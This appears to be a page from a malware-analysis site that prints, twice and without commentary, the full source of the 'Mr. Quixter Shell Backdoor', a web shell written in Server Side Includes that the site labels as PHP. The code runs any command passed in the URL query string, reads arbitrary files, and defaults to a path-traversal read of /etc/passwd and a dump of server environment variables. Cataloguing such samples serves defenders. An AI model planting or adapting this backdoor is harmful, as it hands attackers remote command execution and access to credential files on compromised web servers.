PHP Malware Analysis

Back to list

Tags

URLs
https://mr-quixter.blogspot.com
https://mr-quixter.blogspot.com

Deobfuscated code

<!--#config errmsg="[Error in shell]"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="ls -al" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="inc" value="/../../../../../../../etc/passwd" -->
<!--#else -->
<!--#set var="inc" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<html>
<head>
<title>
Shell Mr. Quixter
</title>
<script language="javascript">
function fex()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+document.getElementById('command').value;
}
function vfile()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?cat "+document.getElementById('vfile').value;
}
</script>
</head>
<body bgcolor=#e4e0d8 alink=blue vlink=blue>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+2><a href=https://mr-quixter.blogspot.com>Mr. Quixter Shell Backdoor</a></font></b></center>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell info</font></b></center>
<br>
<b><font color=blue>GMT date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_GMT --></b><br>
<b><font color=blue>Local date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_LOCAL --></b><br>
<b><font color=blue>Document name</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_NAME --></b><br>
<b><font color=blue>Document URI</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_URI --></b><br>
<b><font color=blue>Last modified</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=LAST_MODIFIED --></b><br>
<b><font color=blue>Owner</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=USER_NAME --></b><br>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Server info</font></b></center>
<br>
<pre>
<!--#printenv-->
</pre>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Command for shell & address for inclusion</font></b></center>
<br>
<b><font color=blue>Enter command/address</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=command>&nbsp;<input type=button value=Run onclick=fex();>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell</font></b></center>
<br>
<b><font color=blue>Executed command</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#exec cmd=$shl -->
</textarea>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Operations on files</font></b></center>
<br>
<b><font color=blue>View file (cat)</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=vfile value=<!--#echo var=SCRIPT_FILENAME -->>&nbsp;<input type=button value=Run onclick=vfile();><br>
<b><font color=blue>Included file</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#include virtual=$inc -->
</textarea>
<br>
</div>
<br>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1><a href=https://mr-quixter.blogspot.com>Touch Me!!</a></font></b><br><OneHatCyberTeam<!--êîïèðàéò ïîìåíÿí â 2011 ;) --></small><br>
Kami Penggiat Cyber Bukanlah Orang Yang Tau Akan Segalanya. Tapi Kami Hanyalah Sekelompok Orang Yang Memanfaatkan Google Dengan Sebaik-baiknya. <br> #Mr. Quixter
</center>
</div>
</body>
</html>


Original code

<!--#config errmsg="[Error in shell]"-->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="ls -al" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="inc" value="/../../../../../../../etc/passwd" -->
<!--#else -->
<!--#set var="inc" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->
<html>
<head>
<title>
Shell Mr. Quixter
</title>
<script language="javascript">
function fex()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+document.getElementById('command').value;
}
function vfile()
{
document.location.href="<!--#echo var=DOCUMENT_NAME -->?cat "+document.getElementById('vfile').value;
}
</script>
</head>
<body bgcolor=#e4e0d8 alink=blue vlink=blue>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+2><a href=https://mr-quixter.blogspot.com>Mr. Quixter Shell Backdoor</a></font></b></center>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell info</font></b></center>
<br>
<b><font color=blue>GMT date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_GMT --></b><br>
<b><font color=blue>Local date</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DATE_LOCAL --></b><br>
<b><font color=blue>Document name</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_NAME --></b><br>
<b><font color=blue>Document URI</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_URI --></b><br>
<b><font color=blue>Last modified</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=LAST_MODIFIED --></b><br>
<b><font color=blue>Owner</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=USER_NAME --></b><br>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Server info</font></b></center>
<br>
<pre>
<!--#printenv-->
</pre>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Command for shell & address for inclusion</font></b></center>
<br>
<b><font color=blue>Enter command/address</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=command>&nbsp;<input type=button value=Run onclick=fex();>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Shell</font></b></center>
<br>
<b><font color=blue>Executed command</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#exec cmd=$shl -->
</textarea>
<br>
</div>
<br>
<div align=left width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1>Operations on files</font></b></center>
<br>
<b><font color=blue>View file (cat)</font></b>:&nbsp;&nbsp;&nbsp;<input type=text size=80 id=vfile value=<!--#echo var=SCRIPT_FILENAME -->>&nbsp;<input type=button value=Run onclick=vfile();><br>
<b><font color=blue>Included file</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
<textarea bgcolor=#e4e0d8 cols=121 rows=15>
<!--#include virtual=$inc -->
</textarea>
<br>
</div>
<br>
<div align=center width=100% border=0 style=background-color:#D4D0C8;>
<center><b><font size=+1><a href=https://mr-quixter.blogspot.com>Touch Me!!</a></font></b><br><OneHatCyberTeam<!--êîïèðàéò ïîìåíÿí â 2011 ;) --></small><br>
Kami Penggiat Cyber Bukanlah Orang Yang Tau Akan Segalanya. Tapi Kami Hanyalah Sekelompok Orang Yang Memanfaatkan Google Dengan Sebaik-baiknya. <br> #Mr. Quixter
</center>
</div>
</body>
</html>